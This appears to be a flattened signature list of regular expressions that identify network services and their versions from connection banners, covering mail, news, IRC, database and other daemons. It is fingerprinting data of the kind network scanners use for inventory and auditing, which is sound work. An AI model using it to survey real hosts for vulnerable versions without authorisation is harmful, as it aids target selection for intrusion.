.*?Courier-IMAP ready\. Copyright 1998-\d+ Double Precision, Inc\. See COPYING for distribution information\.\r\n +\* OK CommuniGate Pro IMAP Server ([-.\w]+) at ([-.\w]+) ready\r\n +\* OK \[CAPABILITY IMAP4rev1 CHILDREN NAMESPACE\] Freemail ready - hit me with your rhythm stick\.\r\n +\* OK AVM KEN!4 IMAP Server ready\r\n +\* OK Microsoft Exchange 2000 IMAP4rev1 server version (\d[-.\w]+) \([-.\w]+\) ready\.\r\n +\* OK Der Microsoft Exchange Server 2003 IMAP4rev1-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\* OK Server Microsoft Exchange IMAP4rev1 verze ([\d.]+) \(([-\w_.]+)\) je p\xf8ipraven\.\r\n +\* OK La version ([\d.]+) \(([-\w_.]+)\) du serveur IMAP4rev1 Microsoft Exchange est pr\xeate\r\n +\* OK Microsoft Exchange Server 2003 IMAP4rev1 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\* OK Servidor IMAP4rev1de Microsoft Exchange Server 2003 versi\xf3n ([\w._-]+) \(([\w._-]+)\) listo\.\r\n +\* OK The Microsoft Exchange IMAP4 service is ready\.\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? v([-.\w\+]+) server ready\r\n +\* OK ([-.\w]+) Cyrus IMAP4 v([-.\w\+]+)-Red Hat [-.\w\+]+ server ready\r\n +\* OK ([-\w_.]+) Cyrus IMAP4 v([-\w_.]+)-Debian| p/Cyrus imapd/ v/2/ i|Debian/Ubuntu +\* OK ([-.\w]+) Cyrus IMAP4 v([\w_.]+)-OS X ([\d.]+) server ready\r\n +\* OK (?:\[CAPABILITY IMAP4[^\]]*?\] )?([-.\w]+) Cyrus IMAP4? Murder v([-.\w]+) server ready\r\n +\* OK Welcome to Binc IMAP v(\d[-.\w]+) +\* OK ([-\w_.]+) Oracle Email Server esimap\t([\d.]+) \t is ready\r\n +\* OK Kerio MailServer ([\d.]+) patch (\d+) IMAP4rev1 server ready\r\n +\* OK Netscape IMAP4rev1 Service ([\d.]+) on ([-\w_.]+) at .*\r\n +\* OK IMAP4 server ready \(Worldmail ([\d.]+)\)\r\n +\* OK HT Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK Softalk IMAP Server ready\r\n +\* OK Welcome to Binc IMAP +\* OK ([-\w_.]+) Mirapoint IMAP4 ([-\w.]+) server ready\r\n +\* OK IMAP4rev1 DvISE Mail Access Server MA-([\w.]+) \(\w+\)\r\n +\* OK IMAP4rev1 GNU mailutils ([\w.]+)\r\n +\* OK IMAP ([-\w_.]+) \(Version ([-\w.]+)\)\r\n +\* OK \[CAPABILITY IMAP4 IMAP4rev1[\w+= -]*\] ([\w._-]+) IMAP4 service \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +\* OK \[CAPABILITY IMAP4[^\]]*\] Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\* OK ([-\w_.]+) IMAP4 service \(iPlanet Messaging Server ([\w. ]+) \(built .*\)\)\r\n +\* OK Anonymous Mail Server v([\d.]+) IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) ModusMail IMAP4 Server ([\d.]+) ready\r\n +\* OK IMAP4rev1 Service at Jana-Server ready\r\n +\* OK \]-:\^:-\[ IMAP4rev1 .*\r\n +\* OK ([-\w_.]+) IMAP4 Service ([\d.()]+) at .*\r\n +\* OK CommuniGate Pro IMAP Server ready\r\n +\* OK IMAP4rev1 SmartMax IMAPMax (\d+) Ready\r\n +\+OK X1 ([-\w_.]+)\r\n +\* OK IMAP4rev1 SmarterMail\r\n +\* OK Scalix IMAP server ([\d.]+) ready on ([-\w_.]+)\r\n +\* OK Scalix IMAP server ([\d.]+) on ([-\w_.]+)\r\n +\* OK .* GoMail V([-\w_.]+) IMAP4rev1 +\* OK IMAP4 ready! [-\w_.]+ Winmail Mail Server MagicWinmail Extend IMAP 101\r\n +\* OK ([-\w_.]+) CallPilot IMAP4rev1 v([\d.]+) server ready\.?\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 service ready\r\n +\* OK ([-\w_.]+) Zimbra IMAP4rev1 server ready\r\n +\* OK ([-\w_.]+) DKIMAP4 IMAP Server\r\n +\* OK ArGoSoft Mail Server IMAP Module v\.([\w._-]+) at +\* OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+)\r\n +\* OK MERCUR IMAP4-Server \(v([\w.]+) \w+\) for Windows ready +\* OK Dovecot DA ready\.\r\n +\* OK AXIGEN ([\w._-]+) \(Linux/i686\) IMAP4rev1 service is ready\r\n| p/Axigen imapd/ v/1/ i|Linux/i686 +\* BYE Hi This is the IMAP SSL Redirect\r\n +\* BYE Domino IMAP4 Server Configured for SSL Connections only\. Please reconnect using SSL Port (\d+), .*\r\n +\* OK Kerio Connect ([\w._ -]+) IMAP4rev1 server ready\r\n +\* OK ([\w._-]+) IMAP4rev1 Server PMDF V([\w._-]+) at +\* OK \[CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL\+ NAMESPACE UIDPLUS CHILDREN LANGUAGE XSENDER X-NETSCAPE XSERVERINFO AUTH=PLAIN\] Messaging Multiplexor \(Oracle Communications Messaging Exchange Server ([\w._-]+) \(built (\w+ \d+ \d+)\)\)\r\n +\* OK IMAP4 Ready ([-\w_.]+) \w+\r\n +\* OK ([-\w_.]+) IMAP server ready\r\n +\* OK IMAP4 proxy ready\r\n +\* OK imapfront ready\. \+ portspoof\r\n +\* OK avast! IMAP Proxy\r\n +\* OK \[CAPABILITY IMAP4rev1\] SpamPal for Windows\r\n +\* OK [-.\w,:+ ]+imap[-.\w,:+ ]+\r\n +\* OK Cyrus IMSP version (\d[-.\w]+) ready\r\n +Protocol Error: XML data is not well-formed\. +\d+\0FORWARD\0\x0b\xc2c\x0c\xc1a\x9f@ +\x0e\0\0\0\0\0\0 +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Found your hostname, cached\r\nNOTICE AUTH :\*\*\* Checking Ident\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* No ident response\r\n +NOTICE AUTH :\*\*\* Looking up your hostname\r\nNOTICE AUTH :\*\*\* Checking Ident\r\nNOTICE AUTH :\*\*\* Couldn't look up your hostname\r\n +ERROR..Your host is trying to \(re\)connect too fast -- throttled\r\n +CAPAB START\r\nCAPAB MODULES [\w_-]+\.so, +CAPAB START 1202\r\n +:([\w._-]+) NOTICE ZUSR :You have been throttled for 2 minutes for too many connections in a short period of time\. Further connections in this period will reset your throttle and you will have to wait longer\.\r\n +ERROR Your host is trying to \(re\)connect too fast -- throttled\r\n +IRCXPRO ([\w._-]+)\r\nAUTHREQUEST :Authentication Required\r\n +:([\w._-]+) 451 \* HELP :No te has registrado\r\n +:([\w._-]+) NOTICE AUTH :Minbif-IRCd initialized, please go on\r\n +:.*!psyBNC@lam3rz\.de NOTICE \* : +:.*!psyBNC@[-\w_.]+ NOTICE \* :psyBNC on ([-\w_.]+)\r\n +:sbnc!sbnc@sbnc\.soohrt\.org NOTICE \* :Wellcum\r\n +\0\0\0.\x08\x01\x04\x01\0..\0\0..\0\0.\0\0\0..\0\0\x80\x04..\0.\0\xa0\0\0 +.*\0\x18Ixia Hardware I/O Server\x13Ixia Communications\x18Ixia Hardware I/O Server\x0b([\d.]+) +\r\nWelcome to the Ixia Socket/Serial TCL Server\r\nPress Ctrl-C to reset Tcl Session\r\nIxia> +JDWP-Handshake +cpu: *[\d.]+ mem: *[\d.]+ swp: *[\d.]+\0 +\xde\xca\xfb\xad\x01\0\0\0\x04\0\t\0[\x07\x10] +ksysguardd ([\d.]+)\n\(c\) +\d+ .*\n\x000 succeeded\n\0 +0 succeeded\n\0 +220 ([-.\w]+) LMTP Cyrus v(\d[-.\w]+) ready\r\n +220 ([\w._-]+) Cyrus LMTP Murder v([\w._-]+) server ready\r\n +220 ([-\w_.]+) LMTP Cyrus v([\d.]+)-Red Hat [\d.-]+ ready\r\n +220 ([-\w_.]+) DBMail LMTP service ready to rock\r\n +220 DSPAM LMTP ([-\w_.]+) Ready\r\n +\x01\*Nsure Audit Novell NetWare \[\w+:\w+\]\r\n +LNS READY<> +0001;2 +\x80\0\0\\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\xff\xff\xff\xff\0\0\0\0\0\0\0\0\0\0\0\0 +\xc1, +\n.*=\[ msf v([^\r\n]+)\r?\n.*\d+ exploits.*\d+ payloads.*\d+ encoders.*\d+ nops.*msf > +MIDASd v([\w.]+) connection accepted\n\xff +\xff\0\x17Took too long to log in +merovingian:2:\w+:\n +MudNames ([\d.]+) - \(C\) 1997-2001 Ragnar Hojland Espinosa \n\r +# munin node at ([-\w_.]+)\n +MULTIPLICITYP + [\d.:a-f]+ is connected as <\w+>\.\n already connected: (.*?)\.\n +\xd6\x81\x81\0\0\xf9\0\xf9\xee\xe3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x80\0\0\\0\0\0\x01....\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0|s p|Symantec/Veritas Backup Exec ndmp +>>messages/login\r\n----- Welcome to the No Name Go Server \(NNGS\) -----\r\n\r\n +.*\0\0\0\x06\0Donkey\x01\x0c\0\./donkey\.ini\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\xff\xfd\x1f[\r\n* ]+Welcome to MLdonkey \r\n +\xff\xfd\x1fWelcome to MLDonkey ([\d.]+)\n\x1b\[3.mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +\xff\xfd\x1fWelcome to MLdonkey, visit http://mldonkey\.dyndns\.info for new Versions\n\x1b\[34mWelcome on mldonkey command-line\x1b\[2;37;0m\n\nUse \x1b\[31m\?\x1b\[2;37;0m for help\n\n\x1b\[7mMLdonkey command-line:\x1b\[2;37;0m\n> +[\x00-\x10]\0\0\0\0\0[^\0]\0\0\0 +\xac\xed\0\x05sr\0\x1elia\.Monitor\.monitor\.monMessage\x8e\xf8\xad\xb0\x14\xe6`!\x02\0\x03L\0\x05identt\0\x12Ljava/lang/Object;L\0\x06resultq\0~\0\x01L\0\x03tagt\0\x12Ljava/lang/String +\n\r\xff\xfbUDo you want ANSI color\? \(Y/n\) | p/ROM-based MUD/ i|http://rrp.rom.org/ +VERSION=MYPROXYv([\w._-]+)\nRESPONSE=1\nERROR=authentication failed\n\0 +.\0\0\0\xffj\x04Host hat keine Berechtigung, eine Verbindung zu diesem MySQL Server herzustellen\. +.\0\0\0\x0a([\w._-]+)\0............\0\x5f\xd1\x2d\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0............\0 +.\0\0\0\n(6\.[-_~.+\w]+)\0...\0 +.\0\0\0\xffj\x04'[\d.]+' .* MySQL +.{128}[\x46-\x53]... +200 NCID Server: ARC_ncidd ([\w._-]+)\r\nCIDLOG: \*DATE\* +Active Internet connections\nProto Recv-Q Send-Q Local Address Foreign Address \(state\)\n +netstat: invalid option -- f\nusage: netstat \[-veenNcCF\] +\x01\0\0\0\x01\0\0\0\0\0\0\0\n\x0c00\d{10} +\x06\x02...([\w._@-]+).. +smbd: error while loading shared libraries: libattr\.so\.1: cannot open shared object file: No such file or directory\n +502 You have no permission to talk\. Goodbye.\r\n +200 NNTP Service Microsoft\xae Internet Services (\d[-.\w]+) Version: \d+\.\d+\.\d+\.\d+ Posting Allowed \r\n +200 ([-.\w]+) DNEWS Version *(\d[-.\w]+).*posting OK \r\n +200 Leafnode NNTP Daemon, version (\d[-.\w]+) running at +200 Lotus Domino NNTP Server for ([-./\w]+) \(Release (\d[-.\w]+), .*\) - Not OK to post\r\n +20. ([-.\w]+) InterNetNews NNRP server INN (\d[-.\w ]+) ready \(no posting\)\.\r\n +200 ArGoSoft News Server for WinNT/2000/XP v ([\d.]+) ready\r\n +200 ([\w.-_]+) NetWare-News-Server/([\d.]+) 'LDNUM' NNRP ready \(posting ok\)\.\r\n +200 ([-\w_.]+) NNRP Service Ready - [-\w_.]+@[-\w_.]+ \(posting ok\)\.\r\n +200 ([-\w_.]+) InterNetNews server INN ([\d.]+) ready\r\n +200 nntp//rss v([\d.]+) news server ready\r\n| p|nntp//rss nntpd +200 Hi, you can post \(sn version ([\w.]+)\)\r\n +200 ([-\w_.]+) NNTP Service Ready, posting permitted\r\n +200 Jana news server ready - posting allowed\r\n +200 NNTP server NOFFLE ([\w.]+)\r\n +502 Could not get your access name\. Goodbye\.\r\n +201 NNTP server ready \(no posting\)\r\n502 No permission\r\n +200 ([-\w_.]+) - colobus ([\d.]+) ready - \(posting ok\)\.\r\n +200 +Kerio MailServer ([\d.]+) +NNTP server ready\r\n +200 NewsCache ([-\w_.]+), accepting NNRP commands\r\n +200 ([\w._-]+) Cyrus NNTP v([\w._-]+) server ready, posting allowed\r\n +200 ([-\w_.]+) ready for action \(Mailtraq ([\d.]+)/NNTP\)\r\n +200 Service available, posting allowed\r\n +200 ([-\w._]+) InterNetNews NNRP server INN (.*) ready \(posting ok\)\r\n +200 [-\[\]\(\)!,/+:<>@.\w ]*nntp[-\[\]\(\)!,/+:<>@.\w ]*\r\n +[4f]\0\0\0V4\x12\0\0\0\0\0\0\0\0\x00[4f]\0\0\0.\0\xf0\0\xd3\x07\t\0.\0.\0.\0.\0.\0..\0\0\0\0.\0\0\0..\0\0.\0 +.\0\x02\0([^\0]+)\0+.\0\x01\0 +200 OK [\d.]+ ([\w._-]+) oco-([\w._-]+) \n +\0X\x08\0\}\x08\r\n\0\.\x08.*\.\.\.\r\n +pbmasterd(\d[-.\w]+)@[-.+\w]+: +PJLINK 1 [0-9a-f]{8}\r +201 Welcome to Poweroff ([\d.]+) created by Jorgen Bosman\r\n +\x01\x04\0\0\0\0\0\rD +NotAuthorized\0\0\0\0\0\0\0\0\0\0\0\0 +usage: [/\w]*/etc/pksd\.conf conf_file\n +version report\n +welcome to the pioneers-meta-server version ([\d.]+)\n +\+ POP2 ([\w._-]+) ([\w._-]+) server ready\r\n +\+OK Ready when you are <200\d+\. +\+OK Internet Rex POP3 server ready < +\+OK DBMAIL pop3 server ready to rock < +\+OK ([-.+\w]+) NetMail POP3 Agent \Re..sion: ([\d.]+) \\r\n +\+OK ([-.+\w]+) Merak (\d[-.\w]+) POP3 +\+OK \]-:\^:-\[ \]-:\^:-\[ POP3 +\+OK POP3 Ready <\d{3,6}\.1[012]\d{8}@([-.\w]+)>\r\n +\+OK [Dd]ovecot ready\.\r\n +\+OK [Dd]ovecot on ([\w._-]+) ready\.\r\n +\+OK Teapop \[v?(\d[-.\w ]+)\] - Teaspoon stirs around again .*\r\n +\+OK ready \r\n +\+OK POP3 server ready \r\n +\+OK AppleMailServer (\d[-.\w]+) POP3 server at ([-.\w]+) ready <\d +\+OK Welcome to MailEnable POP3 Server +\+OK ready <\d{1,5}\.10\d{8}@([-.\w]+)>\r\n +\+OK UCB based pop server \(version (\d[-.\w]+) at sionisten\) starting\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready .* on ([^/]+)/([^\.]+)\.\r\n +\+OK Lotus Notes POP3 server version ([-.\w]+) ready on +\+OK ([-.\w]+) POP3 service \(Netscape Messaging Server (\d[^(]+) \(built ([\w ]+)\)\)\r\n +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+) server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-Red Hat [-\d.]+ server ready < +\+OK ([-.\w]+) Cyrus POP3 v(\d[-.\w]+)-OS X ([\d.]+) server ready < +\+OK ([-\w_.]+) Cyrus POP3 v(\S+Debian\S+) server ready +\+OK X1 NT-POP3 Server ([-\w.]+) \(IMail ([^)]+)\)\r\n +\+OK POP3 \[cppop (\d[^]]+)\] at \[ +\+OK Microsoft Exchange 2000 POP3 server version (\S+).* ready\.\r\n +\+OK Microsoft Exchange POP3 server version (\S+) ready\r\n +\+OK Der Microsoft Exchange Server 2003 POP3-Server, Version ([\d.]+) \(([-\w_.]+)\), steht zur Verf\xfcgung\.\r\n +\+OK Microsoft Exchange Server 2003 POP3 \xb7\xfe\xce\xf1\xc6\xf7\xb0\xe6\xb1\xbe ([\d.]+) \(([-\w_.]+)\) +\+OK Microsoft Exchange POP3-server versie ([\d.]+) is gereed\.\r\n +\+OK \xd1\xe5\xf0\xe2\xe5\xf0 Microsoft Exchange POP3 \xe2\xe5\xf0\xf1\xe8\xe8 ([\d.]+) \xe3\xee\xf2\xee\xe2\r\n +\+OK Le serveur POP3 Microsoft Exchange Server 2003 version ([\d.]+) \(([-\w_.]+)\) est pr\xeat\.\r\n +\+OK Microsoft Exchange POP3 server verze ([\d.]+) je p\xf8ipraven\.\r\n +\+OK Server POP3 di Microsoft Exchange Server 2003 versione ([\w._-]+) \(([\w._-]+)\) pronto\.\r\n +\+OK Microsoft Exchange Server 2007 POP3 service ready\r\n +\+OK ([-.\w]+) POP3 server \(Netscape Mail Server v(\d[-.\w])\) ready +\+OK ArGoSoft Mail Server Freeware, Version \S+ \(([^)]+)\)\r\n +\+OK ArGoSoft Mail Server POP3 Module v\.([\w._-]+) at +\+OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-.\w]+ \(([-.\w]+)\)\r\n +\+OK ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ArGoSoft Mail Server Plus for WinNT/2000, Version [\d.]+ \(([\d.]+)\)\r\n +\+OK ([-.\w]+) Execmail POP3 \((\d[^)]+)\) +\+OK ([-.\w]+) POP3? MDaemon ready using UNREGISTERED SOFTWARE ([\d.]+) \r\n +\+OK ([-\w_.]+) POP MDaemon ([\d.]+) \xd7\xbc\xb1\xb8\xba\xc3 \r\n +\+OK ([-.\w]+) POP3 server \(Post\.Office v([-.\w]+) release ([-.\w]+) with ZPOP version ([-.\w]+)| p/Post.Office pop3d/ v/2 release 3/ i|w/ZPOP 4 +\+OK CommuniGate Pro POP3 Server ([-.\w]+) ready +\+OK CommuniGate Pro POP3 Server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK\r\n +\+OK POP3 v?([\d.]+) server ready <[\w.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <\w{11}>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready <([-.\w@:]+)>\r\n +\+OK Kerio MailServer (\d[-.\w]+) POP3 server ready < +\+OK Kerio MailServer (\d[-.\w]+) patch ([\d.]+) POP3 server ready <[\d.]+@\(null\)>\r\n +\+OK Stalker POP3 Server ([\w.]+) at ([-\w_.]+) ready <.*>\r\n +\+OK ([-\w_.]+) POP3 service \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK Messaging Multiplexor \(iPlanet Messaging Server ([-\w_.\s]+) \(built .*\)\)\r\n +\+OK InterMail POP3 server ready\.\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@unspecified.host>\r\n +\+OK WinRoute Pro ([\d.]+) POP3 server ready <[-\w_.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +\+OK [-\w_.]+ PopMax version ([\d. ]+) POP3 Mail Server Ready, Willing, and Waiting\r\n +\+OK POP3 Welcome to GNU POP3 ([-\d.]+) <[\d.]+@([-\w_.]+)>\r\n +\+OK popserver ([\d.]+) pop3 server ready\r\n +\+OK ([-\w_.]+) NetMail POP3 Agent \R...sion: ([\d.]+) \\r\n +\+OK POP3 server ready \(Worldmail ([\d.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK ([-\w_.]+) POP3 WorkgroupMail ([\d.]+) .*\r\n +\+OK POP3 server ready \(LSMTP v([\w.]+)\) <[\w.]+@([-\w_.]+)>\r\n +\+OK MERCUR POP3-Server \(v([\d.]+) \w+\) for Windows NT ready <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready QuickMail Pro Server for MacOS ([\d.]+) <[\w.]+@([-\w_.]+)>\r\n +\+OK ready\r\n +\+OK POP3 ([-\w_.]+) \(Version ([-\w.]+)\) http://surgemail\.com\r\n +\+OK ([-\w_.]+) running Eudora Internet Mail Server X ([\d.]+) < +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) POP3 Server\] service ready; +\+OK <[\d.]+@([-\w_.]+)> \[XMail ([\d.]+) \(Linux/Ix86\) POP3 Server\] service ready; +\+OK Samsung Contact POP3 interface ready on: ([-\w_.]+)\r\n +\+OK ([-\w_.]+) POP3 service \(Sun Java\(tm\) System Messaging Server ([-\d.]+) \(built .*\) +\+OK Messaging Multiplexor \(Sun Java\(tm\) System Messaging Server (\d[-\w_.]+) \(built .*\)\)\r\n +\+OK ([-\w_.]+) POP3 server \(DeskNow POP3 Server ([\d.]+)\) ready \r\n +\+OK POP3 SINA \(([-\d.]+)\) Server Ready\r\n +\+OK POP3 on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +\+OK \(POP3\) hMailServer ([-\w.]+)\r\n +\+OK Welcome to ([\w._-]+), with Code-Crafters Ability Mail Server ([\w._-]+) <[\d.]+@[\w._-]+>\r\n +\+OK DAWKCo POP3 Server v([-\w_.]+) ready < +\+OK Welcome to ([-\w_.]+), powered by Ocean Mail Server ([\d.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) Solstice \(tm\) Internet Mail Server \(tm\) POP3 ([\d.]+) +\+OK Welcome to RaidenMAILD POP3 service v([\d.]+), +\+OK POP3 FTGate6 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK MERCUR POP3-Server \(v([-\w_.]+) \w+\) for Windows ready <[\d.]+@([-\w_.]+)>\r\n +\+OK 4D Mail ([-\w_.]+) ready < +\+OK ([-\w_.]+) POP3 ([-\w_.()]+) w/IMAP client at +\+OK <-?[\d.]+@([-\w_.]+)>, POP3 server ready\.\r\n +\+OK POP3 server ready <[-0-9a-f]+@([-\w_.]+)>\r\n +\+OK Welcome to Arvixe POP3 server\.\r\n +\+OK POP3 Server ready\r\n +\+OK POP3 server ready\r\n +\+OK POP3 server ([-\w_.]+) ready <[\d.]+@[-\w_.]+>\r\n +\+OK ([-\w_.]+) POP3 Server \(Version ([\w.]+)\) ready at <.*>\r\n +\+OK popd-([\d.]+) ready \r\n +\+OK POP3 server at ([-\w_.]+) ready <[\d.]+@ +-ERR Permission denied - closing connection\.\r\n +\+OK ([-\w_.]+) <[\d.]+@[-\w_.]+>\r\n +\+OK <[\d.]+@([-\w_.]+)>\r\n +\+OK POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK ready <[\d.]+@([-\w_.]+)>\r\n +\+OK Scalix POP3 interface ready on: ([-\w_.]+)\r\n +\+OK POP3 Welcome to ([-\w_.]+) using the Internet Anywhere Mail Server Version: ([\d.]+)\. Build: (\d+) by True North Software, Inc\. +\+OK Welcome to mpopd V([\d.]+)\.\.\.\. :\)\r\n +\+OK [-\w_.]+ Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" 